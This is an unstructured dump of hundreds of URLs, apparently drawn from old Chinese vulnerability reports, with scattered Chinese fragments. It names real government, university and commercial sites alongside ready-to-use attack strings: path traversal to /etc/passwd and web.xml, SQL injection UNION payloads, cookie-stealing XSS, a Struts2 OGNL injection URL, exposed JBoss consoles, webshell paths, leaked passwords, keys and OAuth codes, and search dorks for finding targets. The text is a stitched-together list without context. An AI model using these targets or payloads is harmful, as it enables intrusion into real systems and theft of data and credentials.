http://www.***.gov.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../..&Connector=connectors/jsp/connector http://www.e***k.gov.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../..&Connector=connectors/jsp/connector http://***j.***i.gov.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../..&Connector=connectors/jsp/connector http://www.***g.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../..&Connector=connectors/jsp/connector http://jsj.***i.gov.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../..&Connector=connectors/jsp/connector http://www.emaotai.cn/shop.zip http://hyfw.12306.cn http://68cn.dooland.com/subscription.php?id=2687 http://68cn.dooland.com/forgetpass.php http://68cn.dooland.com/order_submit.php http://dev.g.qq.com/checkLoginCallback.json?id=0&callback=xxxx http://iche.zju.edu.cn http://iche.zju.edu.cn/Default.aspx http://iche.zju.edu.cn/Default.aspx?orgid=1 http://iche.zju.edu.cn/ckfinder/lang/com7.dama.asp http://www.cnpre.com/web/chinasoe/data/ http://www.cnpre.com/admin/link.htm http://www.cnpre.com/admin/link.doc https://www.payele.com/b2b/payment_data_m.php https://www.payele.com/b2b/payment.php http://www.cnpre.com/web/soe/data/login/sj/reghtm.php http://www.cnpre.com/web/soe/data/login/sj/reghtm.php?username=admin1 http://www.cnpre.com/web/soe/data/login/sj/reghtm.php http://www.cnpre.com/web/soe/data/login/sj/reghtm.php http://news.gdredcross.org.cn/web/newsshow_list0.asp?tflag=0 http://tousu.auto.sohu.com/tousu16056.shtml http://wydrops-wordpress.stor.sinaapp.com/uploads/2014/05/qq.wmv http://kyc.ynnu.edu.cn/business/notifyView.jsp?notifyId=1 http://218.7.123.164/business/notifyView.jsp?notifyId=2 http://yk.cueb.edu.cn/business/notifyView.jsp?notifyId=1 http://202.114.177.182/business/notifyView.jsp?notifyId=1 http://210.40.3.16/business/notifyView.jsp?notifyId=1 http://119.97.184.242:8080/business/notifyView.jsp?notifyId=1 http://kyglsk.shnu.edu.cn/business/notifyView.jsp?notifyId=1 http://rms.njit.edu.cn/business/notifyView.jsp?notifyId=1 http://kygl.gdqy.edu.cn/business/notifyView.jsp?notifyId=1 http://211.67.143.15/business/notifyView.jsp?notifyId=1 http://202.113.244.51/business/notifyView.jsp?notifyId=1 http://202.115.67.43/business/notifyView.jsp?notifyId=1 http://210.26.80.98/business/notifyView.jsp?notifyId=1 http://210.45.168.61/business/notifyView.jsp?notifyId=1 http://219.229.222.51/business/notifyView.jsp?notifyId=1 http://keyan.shufe.edu.cn/business/notifyView.jsp?notifyId=1 http://kjc.swun.edu.cn/business/notifyView.jsp?notifyId=1 http://210.26.64.161/business/notifyView.jsp?notifyId=1 http://kyc.xzmy.edu.cn/business/notifyView.jsp?notifyId=1 http://219.246.16.38/business/notifyView.jsp?notifyId=1 http://fsxy.mnu.cn/business/notifyView.jsp?notifyId=1 http://202.195.69.154/business/notifyView.jsp?notifyId=1 http://202.203.194.6/business/notifyView.jsp?notifyId=1 http://61.139.105.156/business/notifyView.jsp?notifyId=1 http://124.205.136.216/business/notifyView.jsp?notifyId=1 http://222.197.183.68/business/notifyView.jsp?notifyId=1 http://59.72.0.2/business/notifyView.jsp?notifyId=1 http://nyj.jl.gov.cn/AgencyView.php?Id=1 http://oa.yuhong.com.cn/login/Login.jsp?logintype=1 http://oa.yuhong.com.cn/log/ecology http://club.womai.com/ http://202.117.112.29/login/List.aspx?ID=10 http://xg.chd.edu.cn/Login/List.aspx?ID=99 http://xg.snnu.edu.cn/Login/List.aspx?ID=99 http://202.200.16.19/login/List.aspx?ID=99 http://202.200.168.108/Login/List.aspx?ID=99 http://xg.snnu.edu.cn/Login/List.aspx?ID=99为例 http://202.96.31.16:8080/vrd/front/dossier/searchOneContent.action?dossierID=297e3da63fa786e101402815e8f10808&page=1&dossierTitle=&dossierQuestionOriginalityContent=&dossierQuestionLanguage=&dossierAnswerOriginalityContent=&dossierAnswerLanguage=&dossierDealState=0&classID= http://aao.neu.edu.cn/dbdx/css/QQ775276942.asp http://summerintern.chinaamc.com/login.jsp http://www.zbqczz.com http://www.muyingzhijia.com/ http://www.muyingzhijia.com/forgetpassword.aspx)填写好要重置的用户名和验证码(随便填写),点击获取手机验证码并抓包 http://189edu.cn/jmx-console/ https://secure.ctrip.com/wapSecurity/ https://secure.ctrip.com/wapSecurity/log/ https://secure.ctrip.com/w******ity/_bin_deployableAssemblies/System.Web.Mvc.dll https://secure.ctrip.com/w*******ity/obj/Release/Ctrip.Wap.SecuritySite.dll URL:http://www.qixian.gov.cn/xx.asp http://waptest.ctrip.com/market/m.ctrip.com.market.zip http://waptest.ctrip.com/passupdate/passupdate.rar http://www.scdfz.org.cn/newslist.jspdictCode=0203&dictType=00&dictName=%B9%A4%D7%F7%BB%FA%B9%B9 http://imrs.csu.edu.cn/)存在SQL注射 http://www.fzsgsl.gov.cn/ http://www.ziyangxian.gov.cn/ http://spaq.yishui.gov.cn/m/search/list.php?t=3&siteId=1 http://passport.cnw.com.cn/ http://wooyun.org/bugs/wooyun-2010-049798 http://au.xridc.com/au/ https://10.0.1.157:10000/ http://www.steeltower.com.cn/CompVisualizeBig.asp?id=15 http://www.jinyuan.gov.cn/jyq/jyq/index.action http://www.xjxdf.com/ http://www.qxaic.gov.cn/ http://www.qxaic.gov.cn/admin http://passport.cnw.com.cn/findusername.php?username=crtest1 http://www.jstxrcb.net/)存在SQL注射可直接注出管理员 http://old.scta.gov.cn/web/main.jsp?go=newsList&pid=13&cid=1725&keyword= site:edu.cn/shownews.aspx?newsno= http://sy.cxxy.seu.edu.cn/shownews.aspx?newsno=133 http://202.119.189.239:8014/shownews.aspx?newsno=14 http://210.29.152.168/shownews.aspx?newsno=187 http://sjjx.siit.edu.cn:81/shownews.aspx?newsno=1 http://www.tyresort.com/ http://www.tyresort.com/hr/upload/resume.html http://www.tyresort.com/hr/write/resume.html http://hqzx.ruiboshi.com/Edu_entrySave.action http://221.230.60.101:81/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL http://slff.bgu.edu.cn/count/ http://slff.bgu.edu.cn/editor/ http://slff.bgu.edu.cn/database/ http://slff.bgu.edu.cn/include/ http://slff.bgu.edu.cn/script/ http://slff.bgu.edu.cn/upload/ http://slff.bgu.edu.cn/images/ http://slff.bgu.edu.cn/database/ http://slff.bgu.edu.cn/School.asp?ID=34 http://slff.bgu.edu.cn/School.asp?ID=34 http://www.cqtelecom.com.cn/ http://www.cqtelecom.com.cn/admin/login.aspx http://www.cnooc-zspc.com/login/Jeecms.do http://www.22shop.com/member/ForgetPwd.aspx?mid=te***rr&email=i***i@yeah.net&code=A4C00***157***42 http://www.22shop.com/member/ForgetPwd.aspx?mid http://220.196.52.75:8080/ http://220.196.52.146/Default.aspx http://220.196.52.210/login/login!index.action http://124.160.192.170/cardzj/ui/login/login.action www.xxxx.com/admin/login.htm登陆到后台 www.vl86.com http://www.nbmc.com.cn/ http://sehd.360.cn/turntable/base/draw/?active=0434a1&qid=MD5值 http://www.phb168.com/ http://www.phb168.com/phbcms/ArtiSearch.do?searchKey=%CD%F5%B6%AC%CA%A4&count=15&chnlId=&typeId=3 http://english.352.com/harborII/presentWebAction!queryPresentRegion.dox http://221.199.9.170:8080/userLogin.action http://dou.tgbus.com/forum.php http://www.zchospital.com/xtwh/upfile.aspx http://221.136.78.209:7001/wscx/ http://221.136.78.209:7001/wscx/zfbzgl/zfbzsq/login_hidden.jsp?password=123456&sfzh=admin http://pan.baidu.com/share/link?shareid=742573219&uk=453023976&fid=512660478 http://bidding.jl.sgcc.com.cn/.svn/entries http://m.gd10010.cn/ http://www.cassrccp.com/) http://gd.cucn.edu.cn) Url:http://bianlun.7k7k.com/admin/test.php http://lol.uuu9.com/lolgl/adminlolgl/AdminList.aspx shencheng:123456 http://www.qsng.cn/helper/reg.do http://ph.qsng.cn/helper/reg.do http://xh.qsng.cn/helper/reg.do http://cx.qsng.cn/helper/reg.do http://lq.qsng.cn/helper/reg.do http://pt.qsng.cn/helper/reg.do site:bbs.amap.com http://www.js96777.com/stk/lwcz/Admin.jsp http://www.pconline.com.cn/adtest.php?url=/../../../../etc/passwd http://www.pconline.com.cn/adtest.php?url=adtest.php http://www.jmyan.com/jmyan.rar http://www.zzeq.gov.cn:8080/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../..&Connector=connectors/jsp/connector http://m.jx.189.cn/ site:jx.189.cn http://219.143.235.205/database/SiteWeaver http://www.weiyun.com/disk/index.html http://www.yozosoft.com/office/fileconvert.jsp的office预览功能,本次重点测试该预览的过滤效果。 http://bbs.lenovo.com/forum.php http://www.lian7.com/ http://www.lian7.com/shop/这个是商店地址,瑞然前台修改了默认页,但从其他目录很容易可以看的出是正在建设的ecshop,而且此版的ecshop的所有漏洞几乎全没修复,直接用exp注入,爆出账号和密码, http://game.funshion.com/home/ http://www.welp.cn/question/26198 www.tgbus.com site:tgbus.com inurl:profile http://www.cie.gov.cn/ http://www.cnfamily.com/ http://www.tspec.cn/ http://www.cpac.com.cn/ http://www.cpac.com.cn/RegistStep2.asp http://www.cpac.com.cn/RegistStep3.asp http://www.cpac.com.cn/RegistStep4.asp http://www.cpac.com.cn/zygg_fb/zuoping/lie.asp http://jiading.tongji.edu.cn/ http://www.baidu.com/ulink?url=http%3A%2F%2Fmusic.baidu.com%2F%2Fdata2%2Flrc%2F34272020%2F34272020.lrc%3Ffm%3Daltg5&wd=lose%20yourself%E6%AD%8C%E8%AF%8D&&tn=baidu&&ie=utf-8&&&&oq=lose%20yourse&&f=3&rsp=1&inputT=11 http://www.jiuyini.com/ http://f.game.tom.com/wod.php inurl:Default3.action inurl:Default2.action uc_key:icu3c8O7AdLa97P126h6O7C1K4Qaocd3q91eTcUcs571B91f84C2o137J9ubj6J7 http://bbs.game.tom.com/ uc_key:icu3c8O7AdLa97P126h6O7C1K4Qaocd3q91eTcUcs571B91f84C2o137J9ubj6J7 http://bbs.game.tom.com/ http://www.qyzl.gov.cn/ dir:C:\Apache http://www.hnrlzysc.com/ http://fxy.xjtu.edu.cn/Show.asp?id=196 www.scrc168.com http://youxi.19lou.com/index.php/article/index/870%22and%20 http://www.158wan.com/index.php/article/index/1060 http://www.cqtelecom.com.cn/Job/ http://www.cqtelecom.com.cn/job/file.asp?uid=276&FileType=Photo http://www.cqtelecom.com.cn/job/file.asp?uid=276&FileType=OtherFile http://login.sina.com.cn/forgot/index?type=sms&entry=sso font-size:16px\ font-size:16px\ http://www.zzradio.cn/)电台协同办公系统(http://218.28.9.114/oa/)存在弱口令,可以导致内部文件,员工信息泄露,登陆后台可上传webshell提权,危害较大! http://hr.ciomp.ac.cn/zhaopin/login/login.jsp http://hr.ciomp.ac.cn/zhaopin/login/login.jsp登录窗口的用户名处填写单引号,提示“user数据库查询错误:[Microsoft][SQLServer http://hr.ciomp.ac.cn/zhaopin/bulletin.jsp?id=79 http://159.226.100.147/upload_files/index.asp http://adm.jlu.edu.cn/new/frame.php?body=c://boot.ini&id=25&mid=202&nid=202&ref=/new/frame.php%3Fbody%3Dinc/tchs.spec.htm%26mid%3D202%26nid%3D202 http://202.198.17.23:8060/cy/common/loginput.erun http://chem.jlu.edu.cn/chemistry/search_result.php?id=1515 http://c.3g.163.com/nc/uc/store/myprizes/?userid=m18******7@163.com http://c.3g.163.com/nc/uc/prize/instance/ http://c.3g.163.com/nc/uc/prize/instance/ http://active.163.com/service/form/v1/1396/list.jsonp?_charset=UTF-8&page=1&pageSize=10&callback=ugc http://www.siteserver.cn/case/ inurl:siteserver site:gov.cn http://www.fcwl.gov.cn/ http://jichang.shciq.gov.cn/ http://www.ordos.lm.gov.cn/ http://www.gd218.org.cn/ http://www.cssttc.gov.cn/ http://www.xbwlg.gov.cn/ http://www.ordos.lm.gov.cn/siteserver/cms/console_tableMetadata.aspx?TableType=JobContent&ENName=au_JobContent%27 http://218.85.65.35/ http://218.85.65.35:9081/jmx-console/abc.jsp JBOSS:http://218.85.65.35:9081/web-console/ http://mail.homeinns.com/login2.html http://baiduapp.brilliantpr.com.cn/uploads/fx.txt http://baiduapp.brilliantpr.com.cn/images/jiangxiang.gif http://baiduapp.brilliantpr.com.cn/images/jiangxiang.gif/a.php http://218.31.33.3:8090/jxtarget!listDepkind2.action http://58.242.2.14:8080/isapadmin/login.do www.reochina.cn www.cnreo.com http://www.cnreo.com/ns!detail.action?id=172 http://ka.tgbus.com上,上面每个淘号买号什么的下面的评论都有问题,是直接套用http://api.tgbus.com/comment2/default.html的,比如 http://ka.tgbus.com/2194/ http://cxcy.jlu.edu.cn:8080/plugins/member/main1.jsp?nodeID=25018&temps=0.55971072264947 http://cxcy.jlu.edu.cn:8080/state/jluCX/jluCXShowResult.jsp?dicID=2500002&temps=1395719666384 DATA:nodeID=25021&stateID=25&logStart=2014-03-18&logEnd=2014-03-25&op=%3D&fromIP=1&Submit=%B2%E9+%D1%AF http://megrez.alibaba-inc.com/***/login.htm http://ux.etao.com/search?q= http://work.alibaba-inc.com/photo/aliwork_app_download.html http://epaper.jlu.edu.cn:81/contribute.php http://epaper.jlu.edu.cn:81/file/_temp/ http://epaper.jlu.edu.cn:81/file/_temp/0386eb4dc03d94c9ed2272d12f47a425154106.php http://epaper.jlu.edu.cn:81/file/_temp/0f09c5f224744c682802a6121cfbe94768673.php http://epaper.jlu.edu.cn:81/file/_temp/199312a312b08245daba688bc8596c96332064.php http://kdjw.hnust.cn/kdjw/kjlbgl.do?method=goStudentSKBmZf&sksjid=39D442A2987841C79234FCE28619A1DB&xs0101id=【此处为学生学号】 http://img.muyingzhijia.com/ http://img.muyingzhijia.com/product/userupload/20140325010115771Chrysanthemum.txt http://img.muyingzhijia.com/Chrysanthemum.jpg http://zs.51ey.com/ http://www.jxnews.com.cn/)的大江网邮箱(http://mail.jxnews.com.cn/)邮箱系统存在Sql注入漏洞。中国江西网 http://www.jxnews.com.cn/ http://mail.jxnews.com.cn/ http://219.242.65.10/ http://www.jnqei.net:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL http://www.hbqx.gov.cn/FCkeditor/editor/filemanager/upload/test1.html http://www.hbqx.gov.cn/UploadFile/2.php;.gif http://webmail.hnu.edu.cn/ http://www.cledu.com.cn/cledu/edit/uploadfile/20143/Fl201403241901162781.asp;jpg http://123.157.141.163:8080 http://123.157.141.247 http://dealer.it168.com/ http://my.dealer.it168.com/Info/Credit.aspx http://image.it168.com/dealerphoto/shop/500x375/0/275/275150.jpg http://image.it168.com/dealerphoto/shop/500x375/0/275/275149.jpg http://image.it168.com/dealerphoto/shop/500x375/0/275/275147.jpg http://image.it168.com/dealerphoto/shop/500x375/0/275/275146.jpg http://image.it168.com/dealerphoto/shop/500x375/0/275/275136.jpg http://image.it168.com/dealerphoto/shop/500x375/0/275/275145.jpg inurl:/main/model/newinfo inurl:newinfo.do?infoId http://www.***.gov.cn/main/model/newsoperation/webEditor/eWebEditor.jsp http://mgt.dns.com.cn/main/api_login.php?Domain=cnwzrise&Suffix=.com&Passwd=9A***Bi&EppOwner=agent1***6 http://www.qliaozhai.com/uploadfile/2013/0228/20130228010517368.jpg/1.php http://iread.wo.com.cn/ http://61.189.63.58/manager/html/ http://app.sina.cn/ranks.php?vt=4&cat=200 http://portal.vsdndata.com/ http://m.antakids.com/ http://www1.scst.gov.cn:90/Tech_Contract/BackDoor/SpecialColumn.aspx http://www1.scst.gov.cn:90/Tech_Contract/BackDoor/VideoCtl.aspx http://www1.scst.gov.cn:90/Tech_Contract/BackDoor/pg_left.aspx http://biotech.ustc.edu.cn/BiotechWeb/BioTech/Pages/BT10/BT100200.aspx?businessId=Default http://biotech.ustc.edu.cn/BiotechWeb/BioTech/Pages/BT10/BT100200.aspx?businessId=Default http://www.sppa.zjut.edu.cn/存在SQL注射 www.tv189.com网站权限绕过或是设计逻辑缺陷,导致影像资源可以未经任何授权而获得。 http://www.hebcf.org.cn/comment_detail.php?commentid=52 http://gzcxw.nmjt.gov.cn:9080/cdsxxporxxx/ http://gzcxw.nmjt.gov.cn:9080/cdsxxporxxx/UserFiles/Image/test/no.jsp http://gzcxw.nmjt.gov.cn:9080/cdsxxporxxx/baseControl/js/editor/FCKeditor/editor//filemanager/browser/default/browser.html?Type=&Connector=connectors/jsp/connector http://gzcxw.nmjt.gov.cn:9080/cdsxxporxxx/baseControl/ http://219.159.71.119/manager/html/upload IP:220.248.245.154 http://ln-n-tax.gov.cn/jis/front/lngs/userregister.jsp http://www.cicams.ac.cn//web/site_search.aspx?searchKey=%27 http://sdlgjjc.sdut.edu.cn)存在SQL注射 http://itbbs.pconline.com.cn/bbs/51224970.html http://benyouhui.it168.com/.svn/entries http://wzb.gxun.edu.cn)存在SQL注射 http://www.sanfu.com/?mod=goods&do=index_new&action=search&search_word= http://gov.demo.powereasy.net/User/Register.aspx随便注册一个用户1,来到用户的短消息验证处。 http://paxy.10010zj.com.cn/ http://zdjc.zju.edu.cn/system/webos/login.htm http://zdjc.zju.edu.cn/system/user/ http://www.econ.fudan.edu.cn/ema/switchdetail.php?pid=696 http://jjsj.neuq.edu.cn/ register.zhenai.com/login/sendmobile.jsps?sendMobile=马赛克&d=马赛克', static.zhenai.com/profile/validatePhoneByCode.jsps profile.zhenai.com/login/loginactionindex.jsps http://news.wit.edu.cn http://www.chinabenet.com/ http://lt.imobile.com.cn/forum.php?mod=viewthread&tid=10482730&extra= http://www.ctyun.cn/ http://i.wo.com.cn/ www.zhiji.com/product_buy/updateorderbyjp.asp自动修改zhijicount值,然“系统自动提交订单,请稍等片刻...”就不用管了,这样免去了对域名的验证,话说目前改为手工确认了啊? http://120.209.138.136:8080/admin/index.php http://120.209.138.136/js/kindeditor/php/file_manager_json.php?path=/zwmsites/chinamobile/ http://120.209.138.136/js/kindeditor/php/file_manager_json.php?path=/ http://www.cdthr.com/rcpj/index.jsp http://219.141.254.195/djqy/login.jsp)也同样适用。 http://www.cdthr.com/rcpj/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://sso.118114.cn/SSO/loginV2.action yjszs.hfut.edu.cn/news.php?id=188 site:kugou.cm inurl:profile http://www.henan-cdt.com/ http://www.mybift.com/thread-546065-1-1.html http://mba.xmu.edu.cn/cmd.jsp http://www.ujs.edu.cn/index/counter.php?id=1 http://218.205.167.233/ https://59.49.15.130:8080/ https://59.49.15.130 http://59.49.15.130:82/log/ecology_20140120.log http://sh.suning.com/life/ch/charge/queryBill.action?typeCode=06&areaCode=351&companyId=172&modeCode=5&chargeAccount=13313413683&invoiceTitle=&refresh=0.9008850780531467 http://www.tjportnet.com/ http://www.gpai.net/index_index.action?searchKind=1&searchType=1¤tPage=1 http://cdt-bcfd.com http://yjsh.gxu.edu.cn/)存在SQL注射 http://www.qahrss.gov.cn/index.action http://www.qahrss.gov.cn/newsPage.action?mid=92&orgid=1 http://www.qahrss.gov.cn/110.htm http://www.gxsdkyy.com/admin/login.aspx?re=http://www.gxsdkyy.com/admin/default.aspx http://imo.iflytek.com/server/loginBindkd.php http://www.gsws.gov.cn/list.jsp?classid=9 http://imo.iflytek.com/server/loginBindkd.php http://211.139.191.144:8001/ http://dev.10086.cn/,且利用网址在dev.10086.cn不存在。故猜测是测试点?! http://211.139.191.144:8001/cmdn/phpMyAdmin/ http://dev.10086.cn/ http://211.139.191.144:8001/cmdn/phpMyAdmin/libraries/select_lang.lib.php http://dev.10086.cn/,两个网站数据库相通的??由于屌丝没法付费破解管理员cmd,且无人帮我,故放弃从网站后台getshell。到此测试结束。 http://cenet.nau.edu.cn/read.asp?id=18 http://client.3g.soufun.com/http/wap/appdownload/download_sfb.html http://client.3g.soufun.com/http/pgservice.jsp?dst=这里是手机号码&messagename=sentmessage&product=soufunbang&time=0.9652428204202439 http://client.3g.soufun.com/http/pgservice.jsp?dst=这里是手机号%26&messagename=sentmessage&product=soufunbang&time=0.9652428204202439 http://x.kuwo.cn/KuwoLive/lb/MyPage?uid=124668296 http://125.93.53.70/SSO/LogOn?ReturnUrl=%2f http://125.93.53.70:9998/ http://125.93.53.70:9998/admin-console/login.seam http://yjszs.hfut.edu.cn/news.php?id=210 http://jcn.scbid.gov.cn/jdjg/WebResource.axd?d=W4rBKx5e5z02dfEHW7yEzw2 http://localhost/MainS http://emed.3322.org/WebService/MainService.asmx urn:schemas-microsoft-com:asm http://bbs.caipiao.58.com/ http://999120.net/ http://bbs.sm.91.com//install/data/update.php http://t.gmw.cn http://iwm.baidu.com/main.html http://m.jx.189.cn/ http://shop.easternmiles.com/solr/ http://web.alltrust.com.cn http://web.alltrust.com.cn/admin-console/login.seam?conversationId=17 http://web.alltrust.com.cn/TWCSM/jsp/sys/login.jsp http://yangtian.lenovo.com.cn/yangtian.tar.gz http://www.legendcapital.com.cn/Admin/fckeditor/editor/filemanager/connectors/test.html http://www.legendcapital.com.cn/legendcapital.rar Nasdaq:AMAP)。高德拥有导航电子地图甲级测绘资质、测绘航空摄影甲级资质和互联网地图服务甲级测绘资质“三甲”资质,其优质的电子地图数据库成为公司的核心竞争力。高德的业务覆盖三大领域: https://openapi.baidu.com/oauth/2.0/authorize?response_type=code&client_id=foRRWjPq8In3SIhmKQw1Pep3&redirect_uri=http://www.renren.com/bind/baidu/baiduLoginCallBack http://www.renren.com/bind/baidu/baiduLoginCallBack?code=f056147c661d0b9fbb6cd305567cb994 http://bras.nju.edu.cn:8080/selfservice/login inurl:info_details.jsp?seq http://www.website.com/editortpxx/upload.jsp http://www.cnu.edu.cn/editortpxx/upload.jsp http://crjy.cnu.edu.cn/zjxy/editortpxx/upload.jsp http://www.biem.edu.cn/editortpxx/upload.jsp http://sw.nedu.edu.cn/editortpxx/upload.jsp http://www.usrn.edu.cn/editortpxx/upload.jsp https://passport.sohu.com/user/tologin http://mail.sohu.com/ http://login.mail.sohu.com/ http://dealer.auto.sohu.com/admin/auth/login.html http://220.181.153.163/cgi-bin/mfs/mfs.cgi?CSrev=0&HDtime=1&HDaddrname=1&CCdata=10.180.153.84%3A9422&CSorder=10§ions=MO http://218.70.65.213/t_index.do http://222.66.39.203/fileupdown/2012-06-15/468303238279230000110000002/456-OA22.doc http://125.64.100.12/ http://125.64.100.12/manage/ http://www.gzcdc.gov.cn/ site:160.com inurl:profile http://www.gzsums.net/bycn/list.aspx?bid=39&cid=750 http://www.gzsums.net/yuanchenhuizhen/hzdtll.asp?id=258 http://hr.gzsums.net:8888/performance/kh_plan/get_code_treeinputinfo.jsp?codesetid= http://login.10086.cn/html/login/login.html http://login.10086.cn/sendRandomCodeAction.action http://www.zzpn.gov.cn/wjj/index.html http://blog.163.com/ap27301_cos/ http://www.zhongchou.cn/home/id-176205 http://www.zhongchou.cn/注册一账户。然后登录,在个人设置里面写上一个简单的测试语句吧,如图 http://uais.lzu.edu.cn/)存在SQL注射 http://uais.lzu.edu.cn/)存在SQL注射 http://59.108.229.254:8088/user/gotoLoginPage.action inurl:website/deptwebsite/Content.jsp?filePath=/ http://www.nxbb.gov.cn/website/deptwebsite/0566/Content.jsp?issueId=38603&msgType=00&filePath=//WEB-INF/web.xml http://www.dayawan.gov.cn/website/deptwebsite/0109/Content.jsp?issueId=18606&msgType=00&filePath=/WEB-INF/web.xml http://www.gdnx.gov.cn/website/deptwebsite/0477/Content.jsp?issueId=18606&msgType=00&filePath=/WEB-INF/web.xml http://www.gdnx.gov.cn/portal/admin/video/AddVideo.jsp http://www.dayawan.gov.cn/portal/admin/offdocsearch/addItem.jsp http://www.dayawan.gov.cn/portal/admin/video/AddVideo.jsp http://59.39.89.120/portal/admin/gazette/InsertFile.jsp http://market.heyuan.gov.cn/ http://59.39.89.120//website/datum/gazette/wooyun.jsp http://bbs.letv.com/static/image/common/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28/xss/%29}}// http://so.letv.com http://so.letv.com/s?wd=%3Csvg+onload%3Dalert%28document.cookie%29%3E&from=pc&ref=click http://ui.letv.com/home.php?mod=space&uid=34270019&do=blog&quickforward=1&id=187 http://sgmj.pps.tv/index.php?m=front&c=sgmj&a=news_list&cateid=136 http://www.zhongchou.cn/deal-topic/id-4931 http://login.wdcq.pps.tv/webgame/createplay.do http://login.wdcq.pps.tv/webgame/createplay.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://humancapital.cufe.edu.cn/)存在SQL注射 http://115.182.51.39/ http://gzcx.hnjt.gov.cn http://gzcx.hnjt.gov.cn/admin http://segmentfault.com/ http://whois.www.net.cn/whois/api_whois_full http://www.baidu.com webshell:http://www.schouqin.gov.cn:89/job/jspspy.jsp。 http://www.weimob.com/.svn/entries http://www.bgs.qtc.edu.cn/WebFormNews.aspx?TNID=235%20& http://www.bgs.qtc.edu.cn/WebFormNews.aspx?TNID=235%20&orgid=1 http://www.bgs.qtc.edu.cn/UpLoad/files/jc.asp http://www.piaolala.com http://www.piaolala.com/buy/creatOrder.do?cinemaCode=73180&ticketId=731801&ticketNum=1&marketcode=undefined http://www.newbalance.com.cn/manage/news.aspx http://www.newbalance.com.cn/manage/userlist.aspx http://www.auditexam.cn/ http://www.auditexam.cn/exam/simulativeExamShow.do?seId=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL# http://www.sxsmyxx.cn/tsims/xxi/index_xxi.asp?cz=wjgl&lx=&bti=13 http://www.hbjdxx.com.cn/tsims/xxi/index_xxi.asp?cz=wjgl&lx=&bti=13 http://www.ndjd.cn:8003/xxi/index_xxi.asp?cz=xxxx&lx=%B2%BF%C3%C5%D0%C5%CF%A2&bti=6 http://www.sxjzwx.com/tsims/xxi/index_xxi.asp?cz=wjgl&lx=&bti=13 http://124.163.243.26:4000/xxi/index_xxi.asp?cz=wjgl&lx=&bti=13 http://www.pds12319.gov.cn/ http://www.pds12319.gov.cn/portal!ask.action?sign=tszx&pNo= http://www.pds12319.gov.cn/zc.htm http://ued.taobao.org/*** http://ued.taobao.org/*** ued.taobao.org/*** http://ued.taobao.org/*** https://api.weibo.com/oauth2/authorize?client_id=482040646&response_type=code&with_offical_account=1&redirect_uri=http://passport.tianya.cn/third/sinaweibo.do http://passport.tianya.cn/third/sinaweibo.do?code=7c0350d1c8dee1a333c15bf8725fc4f9 http://api.kaixin001.com/oauth2/authorize?response_type=code&client_id=832443644017752d378f4d7bc545c3c6&redirect_uri=http://passport.ku6.com/kaixin-userBindCallback.htm?redirect=http://my.ku6.com/my_account/accountbinding&scope=basic%20create_records http://passport.ku6.com/kaixin-userBindCallback.htm?redirect=http://my.ku6.com/my_account/accountbinding&code=4a4720dcf978aba67fbff22e1bdb7aab site:hitao.com https://graph.qq.com/oauth2.0/authorize?response_type=code&scope=get_user_info,get_simple_userinfo,add_topic,upload_pic,add_share&redirect_uri=http%3A%2F%2Fpassport2.pcbaby.com.cn%2Fpassport2%2Fapi%2Fopen_oauth.jsp&state=loginBind%3Dhttp%3A%2F%2Fmy.pcbaby.com.cn%2Fpassport%2Fopens%2Fbind_done.jsp%26type%3Dqzone_baby%26return%3Dhttp%3A%2F%2Fmy.pcbaby.com.cn%2Fuser%2Fsetting%2Fshare.jsp&client_id=219493 http://passport2.pcbaby.com.cn/passport2/api/open_oauth.jsp?code=406961C061F11A3759E738FE5DB95256&state=loginBind%3Dhttp%3A%2F%2Fmy.pcbaby.com.cn%2Fpassport%2Fopens%2Fbind_done.jsp%26type%3Dqzone_baby%26return%3Dhttp%3A%2F%2Fmy.pcbaby.com.cn%2Fuser%2Fsetting%2Fshare.jsp https://graph.qq.com/oauth2.0/authorize?response_type=code&scope=get_user_info,get_simple_userinfo,add_topic,upload_pic,add_share&redirect_uri=http%3A%2F%2Fpassport2.pcbaby.com.cn%2Fpassport2%2Fapi%2Fopen_oauth.jsp&state=loginBind%3Dhttp%3A%2F%2Fmy.pcbaby.com.cn%2Fpassport%2Fopens%2Fbind_done.jsp%26type%3Dqzone_baby%26return%3Dhttp%3A%2F%2Fmy.pcbaby.com.cn%2Fuser%2Fsetting%2Fshare.jsp&client_id=219493 http://passport2.pcbaby.com.cn/passport2/api/open_oauth.jsp?code=406961C061F11A3759E738FE5DB95256&state=loginBind%3Dhttp%3A%2F%2Fmy.pcbaby.com.cn%2Fpassport%2Fopens%2Fbind_done.jsp%26type%3Dqzone_baby%26return%3Dhttp%3A%2F%2Fmy.pcbaby.com.cn%2Fuser%2Fsetting%2Fshare.jsp https://graph.qq.com/oauth2.0/authorize?response_type=code&scope=get_user_info,get_simple_userinfo,add_topic,upload_pic,add_share&redirect_uri=http%3A%2F%2Fpassport2.pcauto.com.cn%2Fpassport2%2Fapi%2Fopen_oauth.jsp&state=loginBind%3Dhttp%3A%2F%2Fmy.pcauto.com.cn%2Fpassport%2Fopens%2Fbind_done.jsp%26type%3Dqzone_auto%26return%3Dhttp%3A%2F%2Fmy.pcauto.com.cn%2Fsetting%2Fshare.jsp&client_id=219603 